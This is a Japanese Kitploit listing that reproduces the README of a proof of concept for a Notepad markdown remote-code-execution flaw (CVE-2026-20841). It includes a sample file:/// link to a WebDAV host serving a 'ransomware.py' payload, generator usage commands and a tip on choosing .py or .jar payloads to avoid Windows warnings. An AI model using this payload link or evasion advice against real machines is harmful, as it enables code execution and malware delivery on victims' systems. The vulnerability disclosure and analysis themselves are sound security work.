Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-20841 — "Windows Notepad RCE" の PoC | Kitploit
ツール/GitHubGitHub/tangent65536/cve-2026-20841
ペイロード生成エクスプロイトフィッシング
GitHubtangent65536/cve-2026-20841

CVE-2026-20841

"Windows Notepad RCE" の PoC

リポジトリを見る
216ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-20841 PoC

"Windows Notepad RCE" 脆弱性の PoC。

免責事項

  1. 私はこの脆弱性を発見した者ではありません。公式開示ページに記載されている元の作者に敬意を表します。私は説明に従って PoC を再現しただけです。
  2. 個人的には、この脆弱性は見た目ほど深刻ではないと思います。特定の条件がターゲットシステムで満たされない限り、トリガーには1回以上のクリックが必要です。条件と制限のセクションを参照してください。この PoC を再現したのは、非常にミームに値するからです。「Notepad RCE」はめちゃくちゃクレイジーに聞こえます。

説明

この「脆弱性」は単純です。Windows メモ帳のマークダウンエンジンは、あまり知られていない URL プロトコルを気にしません。マルウェアアナリストとして、WebDAV ベースおよび SMB ベースのペイロード展開に関する多くのレポートを読んできました。このドキュメントから、file:/// プロトコルを悪用して、WebDAV/SMB サーバー上のファイルを指す URL を作成できます。

root@kitploit:~
[BadLink](file:///\\webdav-payload-host@5005\DavWWWRoot\ransomware.py)

使い方

私は2つのスクリプトを作成しました。1つは Node.js、もう1つは Python です。どちらも WebDAV ペイロードを指すマークダウンファイルを作成します。sample-payloads フォルダー内のサンプルペイロードを使用できます。

Node.js

node poc.js <webdav-server> <port> <payload/path/on/server>

Python

python poc.py <webdav-server> <port> <payload/path/on/server>

出力(poc.md)は現在のディレクトリに生成されます。

条件と制限

  1. メモ帳アプリが脆弱であるにもかかわらず、ほとんどのペイロードファイル拡張子(例:.exe、.lnk、.vbs、...)は組み込みの警告を引き起こします。警告は Windows 自体から発せられます。少なくとも、デフォルトの OOB インストールでコード実行につながると私がテストしたすべてのものは、この必須の警告を表示します。
    fig01

  2. ターゲットデバイスに Python または Java がインストールされている場合、.py または .jar ペイロードを使用して警告ポップアップを回避できます。

パッチ適用後

fig02
リンクをクリックすると、新しいポップアップ警告が表示されるようになりました。

その他

脆弱なバージョンの Windows メモ帳は Uptodown から見つけることができます。インストーラーのデジタル署名を確認し、Microsoft 製であることを確認することを忘れないでください。また、この PoC は VM 内でのみテストする必要があります。

安全に気をつけて、楽しんでください!

ツールをダウンロード